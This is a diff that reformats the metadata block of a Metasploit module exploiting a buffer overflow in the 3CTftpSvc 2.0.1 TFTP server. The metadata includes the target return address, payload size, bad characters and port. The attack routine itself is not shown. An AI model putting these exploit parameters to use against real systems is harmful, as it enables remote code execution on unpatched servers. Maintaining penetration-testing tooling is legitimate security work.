@@ -9,40 +9,45 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Udp
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => '3CTftpSvc TFTP Long Mode Buffer Overflow',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => '3CTftpSvc TFTP Long Mode Buffer Overflow',
+        'Description' => %q{
           This module exploits a stack buffer overflow in 3CTftpSvc 2.0.1. By
-        sending a specially crafted packet with an overly long mode
-        field, a remote attacker could overflow a buffer and execute
-        arbitrary code on the system.
-      },
-      'Author'         => 'MC',
-      'References'     =>
-        [
+          sending a specially crafted packet with an overly long mode
+          field, a remote attacker could overflow a buffer and execute
+          arbitrary code on the system.
+        },
+        'Author' => 'MC',
+        'References' => [
           ['CVE', '2006-6183'],
           ['OSVDB', '30758'],
           ['BID', '21301'],
           ['URL', 'http://web.archive.org/web/20070521014920/http://secunia.com:80/advisories/23113'],
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'thread',
         },
-      'Payload'        =>
-        {
-          'Space'    => 400,
+        'Payload' => {
+          'Space' => 400,
           'BadChars' => "\x00",
           'StackAdjustment' => -3500,
         },
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
-          [ '3CTftpSvc 2.0.1',			{ 'Ret' => 0x00402b02 } ],
+        'Platform' => 'win',
+        'Targets' => [
+          [ '3CTftpSvc 2.0.1',	{ 'Ret' => 0x00402b02 } ],
         ],
-      'Privileged'     => true,
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2006-11-27'))
+        'Privileged' => true,
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2006-11-27',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options([Opt::RPORT(69)])
   end
